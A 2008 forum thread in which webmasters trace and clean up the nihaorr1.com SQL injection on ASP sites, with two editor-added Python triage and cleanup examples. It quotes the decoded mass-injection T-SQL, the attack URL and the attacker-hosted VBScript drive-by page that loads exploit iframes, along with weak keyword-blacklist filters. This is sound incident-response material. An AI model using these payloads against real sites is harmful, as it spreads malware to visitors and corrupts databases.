Anyone know about www.nihaorr1.com/1.js? [Answered]

109 replies

Last post Dec 12, 2008 09:14 PM by Paul Bishop

  • Anyone know about www.nihaorr1.com/1.js?

    Apr 17, 2008 05:35 PM|kckriegs

    The db that supports our company's ecommerce is filling up with this url. We seem to be victims of a SQL injection attack. Is anyone else experiencing this? How are you resolving it? We just happened to see this data... are there other adverse effects to resources other than data?

    Any shared experience would be helpful!

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 18, 2008 05:19 AM|Rovastar

    Not noticed anything.

    Looks dodgy though. I presume you have only just started getting these. Only from 11 Apr?

    That is when the domain nihaorr1.com was registered. IP geolocation shows this machine in Beijing, China.

    What page are they hammering? What do the IIS logs say? Then look at that page. Nearly all hacks now are over HTTP so it will be the devs' fault for having sloppy code.

    Troubleshoot IIS in style
    https://www.leansentry.com/

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 18, 2008 05:34 AM|Rovastar

    Yeah, it is a script bot that spreads a virus; it seems to be very wild atm.

    Googling nihaorr1.com there are many references to it on sites http://www.google.co.uk/search?hl=en&q=nihaorr1.com&btnG=Search&meta= (11,000 references at the time).

    When I clicked on a link, the virus checker popped up warning me of a virus there. I'll not try again.

    It just seems to affect ASP pages at the moment.

    There were a few recent vulnerabilities with ASP and IIS over the last 6 months like

    http://www.microsoft.com/technet/security/Bulletin/MS08-006.mspx

    I expect it is exploiting one of those.

    Take care.

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 18, 2008 10:25 AM|onionlips

    We have been hit by this as well. Luckily a backup ran last night just prior to the attack.

    Our initial investigations are pointing at an attack through IIS using ASP in an overload.

    A whois lookup shows nihaorr1 registered via the Chinese registrar xinnet.com.

    I used the safety of a VM to look under the hood at the operations of the 1.js file.

    It writes several iframes that seem to come up as page not found (Chinese language pack).

    A look at the script is a bit confusing and garbled (of course) but consistent reference is made to "cuteqq" as a variable and variable prefix. It creates an executable; I have yet to determine its intent or impact.

    Googling "cuteqq" pulls up all sorts of harmful flagged pages. Anyone have any insight on that?

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 18, 2008 01:16 PM|autodynamic1

    I also have been hit by this attack on Saturday 4/12/08. It compromised our database and overwrote that script into all of our products. Luckily a database restore fixed the problem. Two days later the same thing happened; I have changed all the database and login passwords and did another db restore. Now today 4/18/08 we got hit again by the same thing, but this time as the pages are loaded ActiveX is activated and wants to run, but of course I did not allow it. Has anybody successfully solved this situation?

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 18, 2008 02:17 PM|rwmorey

    Hi --

    We have been hit with this virus/injection as well. We are running Windows 2003 and I believe I have all the security patches on our system.

    Does anyone have any idea how to prevent this from happening again?

    Rich

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 18, 2008 03:17 PM|eftennis

    We were hit as well last week by a similar one: aspder.

    Now, last night we were hit by the nihaorr1 attack. Last night's was a little more sophisticated. It inserted script logic into various fields in the database. We ran SQL queries to clean it out since no data was removed.

    It appears to be a SQL injector. But we have not found the exact fix for our ASP scripts to stop it. I managed to find entries in our log files to show the time. The interesting part is that it came from a local connection. This appears to be a virus that hijacks a computer to do its dirty work, since the source is not from China.

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 18, 2008 03:57 PM|bcondrey

    Can you let me know what you searched for specifically in your logs? What was the internal PC infected with, did you get a virus name? We had a PC that was infected by a virus called Infostealer, but we aren't sure if the PC caught it from the webserver, or vice versa. Thanks, Barry

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 18, 2008 07:57 PM|davcox

    Yikes, pretty dangerous. A good time to scan your content for this URL and notify the website owners so they can fix their websites and applications and then fix the form validation logic.

    Looks like someone is doing a lot of script code injection into a lot of vulnerable (read: poorly written) forms that aren't validating input to strip out script code. These sites are then carrying JavaScript code that launches the Remote Data Services Control ActiveX control ... to exploit a few known vulnerabilities ... use WFetch to debug this!!! (You can get WFetch for free in the IIS 6.0 Resource Kit.)

    For example, here is how I looked at this:

    GET http://www.nihaorr1.com:80/1.js HTTP/1.1\r\n
    Host: www.nihaorr1.com\r\n
    Accept: */*\r\n
    \r\n

    HTTP/1.1 200 OK\r\n
    Connection: Keep-Alive\r\n
    Content-Length: 110\r\n
    Via: 1.1 RED-PRXY-29\r\n
    Date: Fri, 18 Apr 2008 23:53:38 GMT\r\n
    Content-Type: application/x-javascript\r\n
    ETag: "30e1873949a1c81:237"\r\n
    Server: Microsoft-IIS/6.0\r\n
    Last-Modified: Fri, 18 Apr 2008 11:42:04 GMT\r\n
    Accept-Ranges: bytes\r\n
    \r\n
    document.writeln("<iframe width=\'10\' height=\'1\' src=\'http:\/\/www.nihaorr1.com\/1.htm\'><\/iframe>");\r\n
    \r\n

    Then I made a second request to the iframe it tries to create:

    GET http://www.nihaorr1.com:80/1.htm HTTP/1.1\r\n
    Host: www.nihaorr1.com\r\n
    Accept: */*\r\n
    \r\n

    HTTP/1.1 200 OK\r\n
    Connection: Keep-Alive\r\n
    Content-Length: 1160\r\n
    Date: Fri, 18 Apr 2008 23:53:51 GMT\r\n
    Content-Type: text/html\r\n
    ETag: "fc6b5a164da1c81:237"\r\n
    Server: Microsoft-IIS/6.0\r\n
    Last-Modified: Fri, 18 Apr 2008 12:09:43 GMT\r\n
    Accept-Ranges: bytes\r\n
    \r\n
    <script language=VBScript>\r\n
    on error resume next\r\n
    Set downf = document.createElement("object")\r\n
    downf.setAttribute "classid", "clsid:BD9"&"6C556-6"&"5A3-11D"&"0-983A-00C"&"04FC2"&"9E36"\r\n
    str="Microsoft.XMLHTTP"\r\n
    Set O = downf.CreateObject(str,"")\r\n
    if Not Err.Number = 0 then\r\n
    err.clear\r\n
    document.write("<iframe width=""10"" height=""10"" src=""http://www.nihaorr1.com/Real.gif""></iframe>") \r\n
    document.write("<iframe width=""5"" height=""5"" src=""http://www.nihaorr1.com/Yahoo.php""></iframe>")\r\n
    document.write("<iframe width=""5"" height=""5"" src=""http://www.nihaorr1.com/cuteqq.htm""></iframe>")  \r\n
    document.write("<iframe width=""5"" height=""5"" src=""http://www.nihaorr1.com/Ms07055.htm""></iframe>")  \r\n
    document.write("<iframe width=""5"" height=""5"" src=""http://www.nihaorr1.com/Ms07033.htm""></iframe>")  \r\n
    document.write("<iframe width=""5"" height=""5"" src=""http://www.nihaorr1.com/Ms07004.htm""></iframe>")\r\n
    else\r\n
    document.write("<iframe width=""0"" height=""0"" src=""http://www.nihaorr1.com/Ajax.htm""></iframe>")\r\n
    document.write("<iframe width=""0"" height=""0"" src=""http://www.nihaorr1.com/Ms06014.htm""></iframe>")\r\n
    end if\r\n
    </script>\r\n

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 19, 2008 09:36 AM|asidana

    I've been using the regex below

    Function AlphaNumOnly(MyString)
        Dim sResult, re
        sResult = Trim(MyString)
        Set re = New RegExp
        re.IgnoreCase = True
        re.Global = True
        ' Strip everything that is not a letter, digit or dot. Inside a character
        ' class "|" is a literal, so the original "[^a-z|A-Z|0-9|\.]" also let "|"
        ' through; with IgnoreCase set, a-z already covers A-Z.
        re.Pattern = "[^a-z0-9.]"
        sResult = re.Replace(sResult, "")
        AlphaNumOnly = sResult
    End Function

    and got hit; couldn't find anything in my server log about how it's done.

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 19, 2008 10:47 AM|rwmorey

    I found this security notice on Microsoft's website finally:

    http://www.microsoft.com/technet/security/advisory/951306.mspx

    I have just made the prescribed changes. Hopefully this will stop this from getting me again.

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 20, 2008 12:06 AM|powlette

    Long story short, it's definitely SQL injection. Here's the offending URL:

    orderitem.asp?IT=GM-204;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x...

    Decoding that binary data which is cast to a varchar yields this:

    DECLARE @T varchar(255)'@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name'b.name from sysobjects a'syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T'@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar'['+@C+']))+''<script src=nihaorr1.com/1.js></script>''')FETCH NEXT FROM Table_Cursor INTO @T'@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

    And there you have it. It finds all text columns in the database and adds itself to it.

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 20, 2008 11:46 AM|rwmorey

    Is there a "best practice" for blocking this or similar type attacks?

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 20, 2008 12:51 PM|eftennis

    Thanks. That is the first proof I have seen as to how this works.

    We added a logging function to our SQL calls to try to trap this type of information.

    We have been adding a common script to the top of all of our pages to look for "offending" data in the URL parms or the form variables. Seems like a never-ending task, though. Doing the rework suggested to stop SQL injectors is not an easy project given the hundreds of pages we have.

    We are continuing to fight this. It is a very "resource draining" project.

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 20, 2008 12:58 PM|xtal

    "Best practice" - lots of them - primarily checking each form processing script to ensure that one cannot simply pass in a long field and/or content which has SQL commands such as "select", "update", etc.

    As you can see from this particular situation, the data may not be readily seen as offending (i.e., the binary encoding). Testing length is therefore pretty important as a rule. If you are expecting to insert a product code into a shopping cart or an email address into a registration table, there is no reason to allow a string longer than the field length to be submitted to the database. One could argue that because of that, keep your field lengths to the minimum, etc.

    Minimize the number of dynamic SQL statements.

    Keep in mind that just limiting your form field's "maxlength" property is of little value as these attacks are not validated by any server side browser - they are launched via script or program and often at a very rapid pace.

    If your db connection for your site is using "sa" or equivalent, you also have a problem because they can launch extended stored procs. Make sure your db connection is using "user" level privileges only.

    These are some of the bigger items - there is lots on the net on the topic of 'SQL injection'.

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 20, 2008 12:59 PM|asidana

    I have banned the IP range for now. It's a residential ADSL line from China.

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 20, 2008 08:19 PM|nhertz

    I want to follow up on all the controversy and theories regarding the massive ongoing iframe injections pointing to domains such as nmidahena.com, aspder.com and more recently nihaorr1.com.

    My intention is to focus a little on the facts rather than amplify the ongoing rumours and theories, since this is causing frustrated webmasters to attempt hundreds of different methods to avoid these attacks with no luck.

    The attacks appear to come from China in relation to the public movements to boycott China's Olympic Games.

    To answer the question whether this attack might be using more complex methods beyond just a simple SQL injection, the answer is yes and no.
    The injection appears to be VERY SIMPLE. It does not need to be an ASP page containing a form. Last week we cleaned and patched up more than 10 websites affected by these attacks and 8 of them had been injected through the querystring of a simple "select" page. No forms or update statements existed on the pages from where the injection was entering.
    However, the command being executed is fairly complex in itself.

    I'm saying this because many webmasters are going mad patching up sensitive forms, restricting session IDs etc., only to get attacked again and again.
    You will indeed need to strengthen your code, the sooner the better, but in this particular case consider the following for a temporary solution:

    Create an include file with something like this:

    <%
    if instr(lcase(sql),";--")>0 then
    response.redirect("index.asp")
    end if

    if instr(lcase(sql),"nvarchar")>0 then
    response.redirect("index.asp")
    end if
    %>

    Call it, for example, Validator.asp and put it right before your select statements are executed:

    <!--#include file="validator.asp"-->
    rs.Open sql

    This will not permit some of the key words required to execute this command, and therefore the malicious Exec will not be allowed.

    Of course you have to discover which pages are being used to inject this code.
    Most likely it is not a page that requires a member session to be viewed, since the spiders are attacking pages that are cached in Google.

    Is there a tool or a mechanism to find it?
    The best way to discover when and where the attack is taking place is by running, for example, SQL Server Profiler.
    Set it to record only Exec commands and when the injection happens it will show up and should reflect something like this:

    SELECT Musicas.Artistas, Musicas.Titles, Musicas.Formatos, Musicas.MemIDs, Musicas.Enlsae, Mem.Statesa, Mem.Cities, Mem.Paises, Mem.Users FROM Musicas, Mem Where Musicas.Titles = 'acb;DECLARE @S NVARCHAR(4000);SET @S=CAST0x440045000043005500520053004F005200200046004F0050020004600450054004300480020004E00450058005400
    2000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400
    054002C0040004300200057280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00
    270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E006E0
    06900680061006F00720010062006C0065005F0043007500720073006F007200
    AS NVARCHAR(4000));EXEC(@S);--' And Mem.ID = Musicas.MemIDs ORDER BY Mem.Fealogs DESC

    Once you run the statement through the decrypter you'll get something like this:

    DECLARE @T varchar(255)'@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name'b.name from sysobjects a'syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T'@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar'['+@C+']))+''<script src=nihaorr1.com/1.js></script>''')FETCH NEXT FROM Table_Cursor INTO @T'@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

    This shows how the nihaorr1.com domain is being used by the script to harass the users that visit your page where the script is executed.
    You can also see from the above command that the Exec will try to inject every table in your database which can contain varchar type.

    This is a very annoying attack since the spiders appear to be running in a circle on constant autopilot. However, don't go about thinking that this is as bad as it gets, because the Exec command could easily have been programmed to delete your tables and even drop tables if the external users are configured to have such rights.
    I'm saying this to put a rush on everyone affected by these attacks and to get their sites fixed up as soon as possible.
    These attacks may just be a pre-warning, and if the attackers alter the code to make it delete and drop instead, then we'll be facing much bigger problems.

    Forget about wasting time and money on expensive antivirus and firewall solutions. They cannot do anything against SQL injection attacks and it is a common practice around forums to try and give people a false sense of security by pasting links to different software companies. These attacks are happening where there's vulnerable ASP code and no expensive software can prevent or "clean" this.

    Feel free to contact me and I'll do my best to get back to you.

    Regards,

    Nicolai Hertz
    Software Programmer
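
A worked example added by the editor, not code from any post in this thread. It does mechanically what powlette's post and the Profiler capture above do by hand: find the CAST(0x... AS NVARCHAR(4000)) in a request, decode the hex as UTF-16LE, and report the page, time and client address it came from, which is what several posts here are asking how to search the IIS logs for. The W3C field order is the IIS 6 default; the log lines, site name and IP addresses are constructed for the example, and the statement they carry is the opening clause of the one decoded above, re-encoded.

```python
"""Triage for the hex-encoded T-SQL seen in this thread.

Added example, not code from any post here. Assumes the IIS 6 default W3C
extended log fields, in this order:
date time s-sitename s-ip cs-method cs-uri-stem cs-uri-query s-port
cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
"""
import re
from urllib.parse import unquote

# "CAST(0x<hex> AS NVARCHAR(4000))" once the query string is URL-decoded.
# The "(" is optional and the hex run is open-ended because Profiler pastes
# (like the one above) lose characters and get truncated.
CAST_HEX = re.compile(r"CAST\s*\(?\s*0x([0-9A-Fa-f]{8,})", re.IGNORECASE)
# Shape of the stacked statement used here: ";DECLARE @S NVARCHAR(4000)".
SHAPE = re.compile(r";\s*DECLARE\s+@\w+\s+NVARCHAR\s*\(", re.IGNORECASE)


def decode_nvarchar_hex(hexstr):
    """Decode hex the way CAST(0x... AS NVARCHAR) reads it: UTF-16LE code units.
    A truncated capture may end mid-unit; the partial unit is dropped, not raised."""
    usable = len(hexstr) - (len(hexstr) % 4)
    return bytes.fromhex(hexstr[:usable]).decode("utf-16-le", errors="replace")


def decode_casts(text):
    """Decoded payload of every CAST(0x...) in free text (a query string,
    a Profiler capture, a URL pasted from a log)."""
    return [decode_nvarchar_hex(h) for h in CAST_HEX.findall(text)]


def triage_line(line):
    """Inspect one W3C log line; return a finding dict, or None if clean."""
    if line.startswith("#"):            # "#Fields:", "#Date:" directive lines
        return None
    fields = line.split(" ")
    if len(fields) < 10:
        return None
    query = unquote(fields[6])          # cs-uri-query with %20 etc. decoded
    payloads = decode_casts(query)
    if not payloads and not SHAPE.search(query):
        return None
    return {
        "time": fields[0] + " " + fields[1],
        "client_ip": fields[9],         # c-ip
        "uri": fields[5],               # cs-uri-stem: the page to inspect
        "payloads": payloads,
    }


def triage_log(lines):
    """All findings for an iterable of log lines."""
    return [f for f in map(triage_line, lines) if f is not None]


def encode_as_nvarchar_hex(sql):
    """Inverse of decode_nvarchar_hex; used only to build the sample below."""
    return "0x" + sql.encode("utf-16-le").hex().upper()


# Constructed sample log. SAMPLE_SQL is the opening clause of the statement
# decoded earlier in the thread; the log lines, site and addresses are made up
# (documentation-range IPs), shaped like the posted orderitem.asp request.
SAMPLE_SQL = ("DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR "
              "select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id")
SAMPLE_LOG = [
    "#Fields: date time s-sitename s-ip cs-method cs-uri-stem cs-uri-query "
    "s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status",
    "2008-04-19 03:12:44 W3SVC1 10.0.0.5 GET /orderitem.asp IT=GM-204 80 - "
    "198.51.100.20 Mozilla/4.0 200 0 0",
    "2008-04-19 03:12:45 W3SVC1 10.0.0.5 GET /orderitem.asp "
    "IT=GM-204;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST("
    + encode_as_nvarchar_hex(SAMPLE_SQL)
    + "%20AS%20NVARCHAR(4000));EXEC(@S);-- 80 - 203.0.113.7 Mozilla/4.0 200 0 0",
]

if __name__ == "__main__":
    for finding in triage_log(SAMPLE_LOG):
        print(finding["time"], finding["client_ip"], finding["uri"])
        for payload in finding["payloads"]:
            print("  decoded:", payload)
```

Feed it a whole log file (or paste a Profiler capture into decode_casts) and you get the decoded statement and the page it arrived through without executing anything against the database. Because the hex is read in whole UTF-16 code units, a capture truncated mid-character decodes as far as it goes instead of failing.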


  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 20, 2008 10:35 PM|therage3k

    Hi,
    Having had a couple of customers impacted who did not have database backups going, I thought folks might want a way to clean up the damage caused by these injections.

    This was my solution - it ain't perfect (for example, some folks have variations in the format of injected script tags), but use it / tweak it / be careful as it DOES remove text forever and ever.

    It is fairly generic and in Query Analyzer you can comment out the EXEC and uncomment the PRINT if you want to see the SQL it will run - it simply hunts for the string you provide and removes it. It will hit ntext fields if the length of data is not over 8000 bytes.

    http://shop.zettaspace.com/knowledgebase.php?action=displayarticle&catid=1&id=1

    Hope this helps.

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 20, 2008 10:49 PM|rwmorey

    We appear to have been hit by this through our website that did have a customer entry form connected to an ASP page inserting records. For now I have removed this page and changed the user permission to only SELECT from the appropriate tables. Will this patch my SQL server to prevent this from hitting us again?

    Thanks

    Rich

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 21, 2008 05:28 AM|Rovastar

    Thanks for the update everybody. Looking like it is spreading quickly atm judging by how many views this topic has.

    I still don't think any of my servers have been hit yet but going to have a more detailed search later.

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 21, 2008 06:16 AM|Rovastar

    Also here is a useful cheatsheet for SQL injection:

    http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/

    You could use some of the techniques there to test the security of your site, and it gives a clever insight about some of the techniques used in SQL injections. Basically if you can get some/any information or error message back then you are at risk.

    The attack used here is a combination of many on that site.

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 21, 2008 08:55 AM|bencash

    I have been targeted by this SQL injection exploit.  My ASP programmer is not available for a few days.  Can anyone tell me how to make my MSSQL database read only for the time being?  I do not need anyone to be able to modify this database for the time being, and this would be a simple workaround I guess for now.

    Thanks

    Ben Cashdan 

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 21, 2008 09:51 AM|Rovastar

    bencash

    I have been targeted by this SQL injection exploit. My ASP programmer is not available for a few days. Can anyone tell me how to make my MSSQL database read only for the time being? I do not need anyone to be able to modify this database for the time being, and this would be a simple workaround I guess for now.

    Thanks

    Ben Cashdan

    You are going to allow your ASP programmer back after allowing your site to be hacked. ;)

    Find out what the user connecting to the DB in the connection string is and make that user read only. For more details direct your question over to a SQL forum like www.sqlteam.com

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 21, 2008 11:31 AM|Simontasker

    This threat is the second type my company has been attacked by. After the first attack 2 weeks ago by a different virus we have managed to fend off attacks, but this www.nihaorr1.com/1.js has caused a lot of trouble. I have only recently started as the web developer for a new company, and I've never really used ASP as my main language so this is a difficult time for me. If anyone has any further input other than what is already here please post so people like myself stand a chance.

    Thanks

    Simon

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 21, 2008 02:07 PM|MisterZimbu

    One of my clients has been affected by this exploit, but with some notable differences:

    • Only a few tables in the database were touched, and I can't seem to find a commonality between them (which goes against what the script that was posted earlier was showing).
    • I can't find any evidence of attempts at an injection attack or a successful one in the IIS logs.

    Has anyone who's been affected by this seen any other ways that the attacker could have possibly gotten through besides probing for vulnerabilities in the querystring?

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 21, 2008 04:16 PM|sirach3

    I had the same experience as misterzimbu - only 6 or 7 tables were hit, out of some 50 or so possible tables, in an attack on April 19.  I'm guessing maybe they used a "TOP 6" in the query?  By only hitting a few tables, it achieved a more subtle effect that was not noticed for a full day, whereas attacking all tables would have been apparent immediately.  As in nature, a successful parasite does not kill its host right away.

    Thanks nhertz for the "validator" script suggestion above - a good first line of defense, in addition to all the other usual SQL Injection precautions.  I've learned a painful lesson this past weekend.

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 21, 2008 04:41 PM|MisterZimbu

    I was able to come up with an explanation for both issues. They did in the end come through with a SQL injection attack; I was just looking at the wrong versions of the log files.

    As for the tables that were touched, my explanation was that the largest tables were hit first. The SQL command will eventually hit its timeout doing all the updates on the rows in those tables and not run on the rest.

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 21, 2008 04:53 PM|racekites

    How to fix??

    Are we sure that this is an attack through the URL and not through a form??

    Well my website has been hit twice with this and it has caused serious damage and outage time each time...

    I've come up with a possible quick fix. On my site I have an include file which is included in each ASP file. This include file has all the presentation etc....

    In the top of this file I now have a check of the query string being passed; if an illegal value is found then it forwards the page directly to Google without doing any database stuff:

    <%
    ' Check the raw query string before any database work is done.
    Dim PATH_INFO, QUERY_STRING, SCRIPT_NAME
    PATH_INFO = Request.ServerVariables("PATH_INFO")
    QUERY_STRING = Request.ServerVariables("QUERY_STRING")
    SCRIPT_NAME = Request.ServerVariables("SCRIPT_NAME")

    ' Fragments of the injected statement seen in this thread. The comparison
    ' below is case-insensitive, so one spelling of each keyword is enough.
    ' Note that "-", "(" and ")" also occur in ordinary values such as IT=GM-204.
    Dim passedString(11)
    passedString(0) = "DECLARE"
    passedString(1) = "NVARCHAR"
    passedString(2) = "SET"
    passedString(3) = "CAST"
    passedString(4) = "0x"
    passedString(5) = "("
    passedString(6) = ")"
    passedString(7) = "--"
    passedString(8) = "@"
    passedString(9) = ";"
    passedString(10) = "-"
    passedString(11) = "SELECT"

    Dim x, stringOkay
    For Each x In passedString
        ' InStr is case-sensitive by default; vbTextCompare makes it case-insensitive.
        stringOkay = InStr(1, QUERY_STRING, x, vbTextCompare)
        'response.write (stringOkay)
        If stringOkay <> 0 Then Response.Redirect ("http://www.google.com")
        'response.write ("<br/>Found." & x)
    Next
    %>

    Only time will tell if this will work though !!

    Are there any other suggestions on how to deflect these attacks??

    Cheers
    A

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 21, 2008 05:16 PM|pb_aldea

    Greetings,

    My SQL instructions blacklist includes:

    exe
    create
    declare
    script
    insert
    update
    drop
    delete
    insert
    go

    Both query string and form data are filtered. Even then, somehow, one administrator with an infected computer opened the security breach. The infection probably adds the instruction in the form data.

    Lesson learned: Trust no one.

    Now, this is where the fun begins... I'm having trouble trying to restore the backups made 2 weeks ago; even when my backup file states that the available data extends up to 4 months ago I still keep getting yesterday's corrupted data. SQL documentation is not helping me.

    Any clue?

    Thanks, best regards.

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 21, 2008 05:51 PM|Sleuth23

    MZ,

    Can you shed some light as to what you searched for to determine how you were compromised. What logs did you search and what did you search for?

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 21, 2008 06:10 PM|pb_aldea

    On log files I found nothing and form data is not logged anywhere.

    Lately I've found malformed links from my own site but they're not an issue; it's just the script that ran more than once on the same table and now the content has some strings like <scr<scr<script src=...

    I'm wondering if the system tables were affected too; this issue with my backup kept me stuck to my desk the whole weekend.
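
An added example, not from any post here, for the cleanup that therage3k's script and pb_aldea's "<scr<scr<script src=..." fragments are about. The injected update decoded above is rtrim(convert(varchar,[col]))+'<script src=nihaorr1.com/1.js></script>'; convert(varchar, ...) with no length is varchar(30) in SQL Server, so each run keeps only the first 30 characters of the current value before appending the tag. That is where the fragments come from, and it also means anything beyond 30 characters of the original value was discarded on the first run and can only come from a backup. The Python below models one run on a string, strips whole tags plus a trailing truncated one, and flags rows whose cleaned value is exactly 30 characters; the sample rows are constructed.

```python
"""Cleaning column values hit by the cursor statement decoded in this thread.

Added example, not code from any post here. The statement's update expression,
rtrim(convert(varchar,[col]))+'<script src=nihaorr1.com/1.js></script>', calls
convert(varchar, ...) with no length, which SQL Server treats as varchar(30):
each run keeps only the first 30 characters of the current value and appends
the tag. model_run() reproduces one run on a Python string so the cleaner can be
exercised on realistic damage; the sample rows below are constructed.
"""

MARKER = "<script src=nihaorr1.com/1.js></script>"   # tag appended by the statement


def model_run(value, marker=MARKER):
    """What one execution of the update leaves in a (wide enough) column:
    first 30 characters, trailing blanks trimmed, then the tag. Test data only."""
    return value[:30].rstrip() + marker


def strip_injected(value, marker=MARKER):
    """Remove every whole copy of the tag, then the longest leading fragment of
    it left at the end of the value by the 30-character window (the "...<scr"
    that sits in front of a later whole copy once that copy is removed)."""
    if value is None:
        return None
    cleaned = value.replace(marker, "")
    # Longest prefix first, so "<script src=nihaor" is not mistaken for "<".
    # A genuine value ending in such a fragment (e.g. a lone "<") would lose it too.
    for n in range(len(marker) - 1, 0, -1):
        if cleaned.endswith(marker[:n]):
            cleaned = cleaned[:-n]
            break
    return cleaned


def clean_rows(rows, marker=MARKER):
    """Clean (key, value) pairs and report which rows changed. A cleaned value of
    exactly 30 characters may have been longer before the first run; that data
    is not in the row any more and has to come from a backup."""
    report = []
    for key, value in rows:
        cleaned = strip_injected(value, marker)
        touched = cleaned != value
        report.append({
            "key": key,
            "cleaned": cleaned,
            "touched": touched,
            "possibly_truncated": touched and len(cleaned) == 30,
        })
    return report


# Constructed sample rows: untouched, hit twice (short value), hit once (long value).
SAMPLE_ROWS = [
    (1, "Plain value"),
    (2, model_run(model_run("Acme Widgets Incorporated!"))),
    (3, model_run("Northwind Traders of Greater Seattle")),
]

if __name__ == "__main__":
    for row in clean_rows(SAMPLE_ROWS):
        print(row["key"], repr(row["cleaned"]),
              "touched" if row["touched"] else "",
              "CHECK BACKUP" if row["possibly_truncated"] else "")
```

Run it against an export of the affected rows (or port the same two steps to a REPLACE-based UPDATE), and treat every row flagged possibly_truncated as a restore-from-backup item rather than a successful clean.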

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 21, 2008 08:08 PM|Sleuth23

    Maybe someone can answer this.

    Would it be safe to assume that if there is nothing in the IIS logs, it was because the injection was form-based?

    If it was URL-based, would I see something in the IIS logs?

    The server was restored but I can't recommend it go back online until we identify the attack vector and vulnerability. If it is just a poorly coded form or two, that is an easy fix.

    Any help appreciated.

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 21, 2008 11:07 PM|steve schofield

    If it's in a querystring variable, this would be logged in your IIS logs. SQL injections can happen in a form post, but normally it is a malformed URL.

    Steve Schofield
    Windows Server MVP - IIS
    http://iislogs.com/steveschofield
    http://www.IISLogs.com
    Log archival solution
    Install, Configure, Forget

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 21, 2008 11:56 PM|Sleuth23

    Thanks Steve

    I have found nothing in the IIS logs thus far. I am still looking though.

    Anywhere else I should be looking?

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 22, 2008 09:22 AM|lossman

    Thanks for all the info.

    I did set up the Profiler assuming you meant to track Exec: Prepared SQL.  I didn't change any other defaults.

    Brett

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 23, 2008 06:54 PM|bestis

    This is a site that is reached when a user clicks on an attachment (lately Tibetan rights stuff) that downloads an infected JavaScript file. It is malicious and you really need to block it incoming and outgoing. If you go to http://whois.domaintools.com/nihaorr1.com you'll see that it is hosted in China.

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 24, 2008 02:06 PM|fabrica.cz

    That helped me. For the SQL user, disallow SELECT permission on the tables syscolumns and sysobjects.

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 24, 2008 05:11 PM|nhertz

    I would advise anyone affected by this attack to activate the SQL profiler (or equivalent) and set it to record only EXEC commands. If your website then becomes infected again you can quickly scroll through the profiler output and find the "suspicious" command where the injection has entered. This should also give you a hint of the exact page that had the vulnerability.

    I cleaned up a site this week where the profiler had recorded:

    SELECT TOP 100 People.Countries, States.Titles, Houses.Types FROM People, States, Houses Where People.Titles LIKE '%agent;DECLARE @S NVARCHAR(4000);SET etc......

    So I could quickly locate the page which had the SELECT TOP 100 statement.
    That is where I added the quick fix:

    <%
    some code here....
    %> 
    <!--#include file="validator.asp"-->
    <%
    rs.Open sql
    %>

    With the validator file containing:

    <%
    if instr(lcase(sql),";--")>0 then
    response.redirect("index.asp")
    end if

    if instr(lcase(sql),"nvarchar")>0 then
    response.redirect("index.asp")
    end if
    %>

    Cheers and good luck,

    Nicolai Hertz
    software programmer

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 25, 2008 01:22 PM|xp_cmdshell

    You guys need to get a clue...it's called prepared statements. 

